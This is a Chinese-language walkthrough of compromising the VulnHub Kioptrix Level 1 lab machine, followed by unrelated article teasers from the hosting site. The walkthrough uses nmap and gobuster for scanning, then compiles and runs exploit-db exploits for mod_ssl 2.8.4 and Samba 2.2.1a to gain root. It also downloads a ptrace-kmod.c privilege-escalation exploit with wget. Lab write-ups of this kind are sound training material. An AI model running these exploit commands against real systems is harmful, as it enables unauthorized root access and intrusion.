vulnhub-Kioptrix_Level_1靶机的测试报告

news2024/10/12 16:01:21

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、解决检测不到IP的问题

2、信息搜集

3、利用exp

①mod_ssl2.8版本漏洞

 ②smb2.2版本漏洞

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.202.134)

靶  机:Linux kioptrix.level1 2.4.7-10

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录遍历)、searchspoilt(查找漏洞库)、msf(执行exp)、gcc(编译C源码)、apt-get(安装库函数)

测试网址:http://192.168.202.164

二、测试目的

根据靶机存在的smb版本漏洞和mod_ssl版本漏洞,利用exp获取root权限。

三、操作过程

1、解决检测不到IP的问题

该靶机直接打开会检测不到IP

解决办法:

1.关闭虚拟机并移除

2.将.vmx文件中以 ethernet0 开头的条目删除并保存修改

3.将VirtualHW.version改为VMware的版本保存

4.重新添加网络适配器,原来的桥接删除

2、信息搜集

主机探测

arp-scan -l

靶机的IP:192.168.202.164

端口和服务探测

nmap -sS -A -T4 -p- 192.168.202.164

开启了ssh服务(22端口)、web服务(80端口、443端口)、smb服务(139端口)

可以看到apache版本是1.3.20   mod_ssl版本是2.8.4  都是很老的版本,存在漏洞

https服务访问不到,状态码400

目录扫描

gobuster dir -u http://192.168.202.164 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

80端口打开是apache默认页

test.php页面也是测试页面,没有信息

3、利用exp

通过exp直接能获取root权限

①mod_ssl2.8版本漏洞

查找该版本漏洞,远程的缓冲区溢出漏洞

漏洞库:

https://www.exploit-db.com/

下载exp,查看源码,通常会有编译命令

安装需要的库

apt-get install libssl-dev

将exp上传到kali,进行编译

gcc 47080.c -o ccc -lcrypto

报了错,但编译成功了

运行编译好的程序,查看参数使用方法

需要系统版本编号、IP地址、ssl服务的端口

查找一下靶机相关的系统版本

是redhat版本的Linux, apache版本是1.3.20

有两个版本编号可以使用

./ccc | grep '1.3.20'

使用管道符,查找特定apache版本的编号

./ccc 0x6a 192.168.202.164 443
./ccc 0x6b 192.168.202.164 443

都尝试,0x6b的版本getshell成功,不过只是普通用户权限

报了一些ssl连接失败的错误,https连接出了问题

一个新的exp未下载成功

可以手动下载编译并执行exp

使用http访问

​wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
gcc -o exploit ptrace-kmod.c
./exploit

成功获取root权限

 ②smb2.2版本漏洞

靶机smb服务的版本还未知,先用msf查看一下

使用auxiliary模块下的smb_version探测

search smb_version

设置靶机IP为参数即可

use 0
show options
set rhost 192.168.202.164
run

探测到smb服务的版本是2.2.1a

查找该版本的漏洞,有远程命令执行的exp可以使用

查找exp路径,查看源码

searchsploit -p 10.c
cp /usr/share/exploitdb/exploits/multiple/remote/10.c 10.c
cat 10.c

直接编译即可,运行查看参数

gcc 10.c -o zzz
./zzz

需要给定靶机的IP

-b参数指定系统类型

其他默认即可

执行exp获取靶机root权限

./zzz -b 0 192.168.202.164

四、结论

使用工具要及时更新版本,避免使用存在漏洞的版本。系统也要及时打补丁。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2208267.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【前端构建】Webpack: 现代前端开发的核心工具

🌈个人主页: 鑫宝Code 🔥热门专栏: 闲话杂谈| 炫酷HTML | JavaScript基础 ​💫个人格言: "如无必要,勿增实体" 文章目录 Webpack: 现代前端开发的核心工具1. 引言2. Webpack 的核心概念2.1 入口&#x…

vmware下ubuntu18.04中使用笔记本的摄像头

步骤1:在windows中检查相机状态 win10系统中,在左下的搜索栏,搜索“相机”,点击进入即可打开相机,并正常显示图像。 注意:如果相机连接到了虚拟机,则不能显示正常。 步骤2:…

解决ubuntu 下 VS code 无法打开点击没反应问题

从Ubuntu 22.04 升级到ubuntu 24.04 后,发现Vsode无法打开,不论是点击图标,还是terminator里面运行code 可执行程序,均没有反应。debug如下: 提示权限不够。 解决方案: sudo sysctl -w kernel.apparmor_restrict_unp…

最佳BD仓储物流方案选择秘诀!

BD仓储部署策略的执行方案是一项既精细又全面的流程,目的在于保障BD装备的安全保管、高效化管理以及迅速调动。以下详列了一项涵盖众多核心环节及要素的具体执行方案: 一、项目开展与策划 确立项目核心目标:精准定位BD仓储解决方案的关键目…

瑞芯微RK3399开发板Android7.1修改网络优先级方法,触觉智能演示

本文介绍Android7.1修改网络优先级方法,基于触觉智能SBC3968主板,搭载瑞芯微RK3399芯片,这块主板的网络优先级默认是网口>WiFi>4G,下面就手把手教大家怎么修改。 1、查看当前网络优先级数值 源码根目录下执…

springboot乐享田园系统

基于springbootvue实现的乐享田园系统 (源码L文ppt)4-080 4.3 系统结构设计 构图是系统的体系结构,体系结构是体系结构体系的重要组成部分。系统的总体结构设计如图4-2所示。 图4-2 系统总体架构图 4.4 数据库设计 4.4.1 数据…

IDEA使用Alibaba Cloud Toolkit插件自动化部署jar包

一、下载插件 二、添加服务器主机 三、填写自己服务器配置 四、添加配置 五、配置说明 六、选择maven打包模块 七、maven打包后的jar包位置配一下 八、点击运行发现成功

MySQL-数据库的基础操作 o(´^`)o

文本目录: ❄️一、数据库操作: ☑ 1、查看所有的数据库: ☑ 2、创建数据库: ☑ 3、使用数据库: ☑ 4、删除数据库: ❄️二、常用的数据类型: ➷ 1、数值类型: ➷ 2、字符串类型&a…

MacOS安装MySQL和Navicat

MacOS安装MySQL和Navicat 前言一、MySQL1、下载并安装 MySQL2、启动 MySQL 并连接3、创建数据库 二、Navicat1、官网下载2、安装3、配置链接 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧&#xff01…

(JAVA)B树和B+树的实现原理阐述

1. B 树 2-3树中,一个节点最多能有两个key,它的实现红黑树中适用对链接染色的方式去表达这两个key。下面将学习另一种树形结构B树,这种数据结构中,一个节点允许多余两个key的存在。 B树是一种树状数据结构,它能够存储…

Hopfield神经网络求解旅行商问题(Traveling Salesman Problem,TSP),提供完整MATLAB代码,复制粘贴即可运行

Hopfield神经网络是以美国物理学家约翰霍普菲尔德(John Hopfield)的名字命名的。他在1982年提出了这种类型的神经网络模型,因此通常被称为Hopfield网络。Hopfield网络是一种早期的人工神经网络,具有以下特点: 递归连接…

【重磅升级】基于大数据的股票量化分析与预测系统

温馨提示:文末有 CSDN 平台官方提供的学长 QQ 名片 :) 1. 项目简介 伴随全球经济一体化和我国经济的快速发展,中国股票市场对世界经济的影响力不断攀升,中国股市已成为全球第二大股票交易市场。在当今的金融市场中,股票价格的波动…

图像处理中常用的统计矩

目录 原点矩中心矩常用的统计矩偏度(Skewness)定义解释 峰度(Kurtosis)定义解释 统计矩的应用MATLAB相关函数 原点矩(Moment about the Origin)和中心矩(Central Moment)是概率论和数…

YOLOv11改进 | 融合篇,YOLOv11改进主干网络为MobileNetV3+CA注意机制

YOLOv11改进介绍 YOLOv11 跟 YOLOv8 结构差不多相似,只是作者在 YOLOv8 基础上进行了改进,我感觉 YOLOv11 训练速度更快,map和精度应该比 YOLOv8 高一些,所以我会把 YOLOv11 改进也写在本专栏里面。YOLOv11 改进,可以看往期 YOLOv8 改进主干网络教程,原理都是一样的,这…

【m6A】如何调节【免疫】,双热点如何碰撞出火花?

国自然已经放榜许久,【免疫】和【m6A】(N6-甲基腺苷)再次成为热门研究主题。m6A作为真核生物mRNA的主要表观遗传修饰之一,它通过调控mRNA的稳定性、剪接、运输和翻译等过程,进而影响基因的表达[1]。 图1.关键词【免疫、…

热烈祝贺!开利网络成为第一批广州市数据要素入库企业

今日,我们怀着无比激动的心情,热烈祝贺 广州市开利网络科技有限公司成为第一批广州市数据要素入库企业!这一殊荣,是对 广州市开利网络科技有限公司在数据领域卓越表现的高度认可,更是 广州市开利网络科技有限公司发展历…

华为OD机试 - 排队游戏 刺头学生(Python/JS/C/C++ 2024 E卷 200分)

华为OD机试 2024E卷题库疯狂收录中,刷题点这里 专栏导读 本专栏收录于《华为OD机试真题(Python/JS/C/C)》。 刷的越多,抽中的概率越大,私信哪吒,备注华为OD,加入华为OD刷题交流群,…

动态规划lc

先找到规律,然后找边界情况;部分特殊情况分类讨论 *递归 70.爬楼梯 简单 提示 假设你正在爬楼梯。需要 n 阶你才能到达楼顶。 每次你可以爬 1 或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢? 示例 1: 输入&#xff1a…

瑞芯微RK3566/RK3568 Android11使用OTA升级固件方法,深圳触觉智能鸿蒙开发板演示,备战第九届华为ICT大赛

本文介绍瑞芯微RK3566/RK3568在Android11系统OTA升级固件方法,使用触觉智能的Purple Pi OH鸿蒙开发板演示,搭载了瑞芯微RK3566,Laval官方社区主荐! 1、OTA包生成 在源码根目录上执行以下命令编译OTA包 # make installclean # …

效率提高——自动登录校园网(河海大学)与模拟点击与输入获取最新消息

文章目录 零、前言一、自动登录校园网1.1 快速锁定小工具1.2 版本问题1.3 出现进程未结束的情况1.4 关于chromedriver.exe1.5 打包ico图片格式 二、获取信息门户最新消息参考文章 零、前言 最近被校园网弄的也是比较烦心,而且准备远程弄弄这些玩具,为以…